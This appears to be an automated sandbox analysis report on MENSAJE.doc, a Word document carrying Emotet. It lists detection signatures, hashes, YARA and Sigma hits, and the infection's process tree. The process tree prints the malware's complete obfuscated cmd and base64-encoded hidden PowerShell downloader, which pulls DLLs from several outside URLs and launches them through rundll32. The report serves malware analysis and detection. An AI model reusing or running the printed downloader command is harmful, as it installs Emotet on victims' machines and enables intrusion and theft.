Loading ...

Play interactive tourEdit tour

Analysis Report MENSAJE.doc

Overview

General Information

Sample Name:MENSAJE.doc
Analysis ID:343668
MD5:cca3520e9a551b59637a6f7cecf4b39f
SHA1:cbc4f477ab784d5b13f0f1bae27cd89e0b2ac10c
SHA256:0965ec391a19f82dbbcc65557513a1b5a98d0fbec1c3a7f66aa6e32e667fb5a0

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2416 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2376 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2496 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2308 cmdline: powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAKwAnACAAJwArACcAYgA6ACcAKwAnAC8AJwArACgAJwAvAHcAJwArACcAaAAnACsAJwBpAHQAZQAnACkAKwAnAHQAJwArACcAaABlACcAKwAoACcAbQAnACsAJwBlAC4AJwApACsAJwB4AHkAJwArACgAJwB6AC8AJwArACcAdwBwAC0AYwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQALwAnACsAJwBxACcAKQArACcAOABIACcAKwAoACcALwAhAHgAJwArACcAIABbACcAKwAnACAAcwBoACcAKQArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAvAHIAJwArACcAZQB4ACcAKQArACgAJwAuAHQAYQAnACsAJwBzACcAKwAnAG0AaQByACcAKQArACgAJwBhACcAKwAnAGcAcgBvAHUAcAAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3ACcAKwAnAHAALQAnACkAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbAB1AGQAJwArACcAZQBzAC8AdQBuADYARwAvACcAKwAnACEAeAAgACcAKQArACgAJwBbACAAJwArACcAcwBoACAAYgA6ACcAKwAnAC8ALwAnACkAKwAnAHIAJwArACcAYQBiACcAKwAoACcAaQAnACsAJwBlAGkALgAnACkAKwAoACcAZgB1ACcAKwAnAG4ALwAnACkAKwAnAGUAaQAnACsAJwBkAGwAJwArACgAJwAtAHIAZQBjAG8AbgBzACcAKwAnAGkAJwArACcAZAAnACkAKwAnAGUAJwArACgAJwByAGEAJwArACcAdABpACcAKQArACgAJwBvAG4ALQBiAHMAJwArACcAMwBsACcAKwAnAHUALwAnACkAKwAoACcAZgBlACcAKwAnAG8AJwApACsAJwBPAGkAJwArACgAJwBBAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAgAHMAJwApACsAKAAnAGgAJwArACcAIABiACcAKQArACgAJwA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwB2AG4AJwApACsAJwBzAGsAJwArACgAJwBpACcAKwAnAG4ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwBoAC8AJwApACsAKAAnAEkAQgAnACsAJwAvACcAKQApAC4AIgByAGAAZQBwAGwAYABBAGMARQAiACgAKAAoACcAeAAnACsAJwAgAFsAJwApACsAJwAgAHMAJwArACgAJwBoACAAJwArACcAYgAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQAVABrADEAcQB3AHQAOQAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAFAAYABMAGkAdAAiACgAJABSADYAOQBJACAAKwAgACQAUwA0AGsANgB0AHIAagAgACsAIAAkAEMAMgA4AFEAKQA7ACQAQgAwADUASwA9ACgAJwBDACcAKwAoACcAOAAwACcAKwAnAE4AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAdQA1AHQAdAB0AGEAIABpAG4AIAAkAE8AeQBsAHgAMQBkAGMAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBzAHQAZQBtAC4ATgBlAFQALgB3AEUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAG8AdwBuAGAAbABvAEEARABmAGAASQBMAGUAIgAoACQAVAB1ADUAdAB0AHQAYQAsACAAJABNAHQAbgAwADUAdgByACkAOwAkAEoAXwA0AEgAPQAoACgAJwBOACcAKwAnADAAMgAnACkAKwAnAFYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAE0AdABuADAANQB2AHIAKQAuACIATABFAG4AYABHAGAAVABIACIAIAAtAGcAZQAgADQAMQA3ADMANwApACAAewAmACgAJwByAHUAbgBkAGwAJwArACcAbAAzADIAJwApACAAJABNAHQAbgAwADUAdgByACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAJwBTACcAKwAoACcAdAByACcAKwAnAGkAbgAnACkAKwAnAGcAJwApAC4AIgB0AG8AcwB0AGAAUgBpAGAATgBnACIAKAApADsAJABTADQANwBXAD0AKAAnAFcAMwAnACsAJwBfAE4AJwApADsAYgByAGUAYQBrADsAJABTAF8ANABFAD0AKAAoACcAQgAnACsAJwA1ADQAJwApACsAJwBaACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQAzADUAUgA9ACgAJwBDADYAJwArACcANQBCACcAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2512 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2360 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',xwmmryHmiBrcQ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqnknlpyv\hvpedfkj.tan',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',LiprInkL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 912 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ceelf\ceht.ynf',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2312 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',ZlOVOPTFkFCSlH MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gstbghdcbll\xymuoataos.ccr',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 3032 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',dHWvVgE MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 620 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lzlvyublnqyq\ovcucjzboyk.nwn',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2368 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',XiceWXom MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 948 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Woooizzjxmgfwuv\lldxvtebowotvy.flt',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.rundll32.exe.1c0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.10000000.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                14.2.rundll32.exe.1c0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  17.2.rundll32.exe.130000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    10.2.rundll32.exe.6d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 67 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2360, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Liq8l58\Egok7ei\D64O.dll',#1, ProcessId: 2708
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8A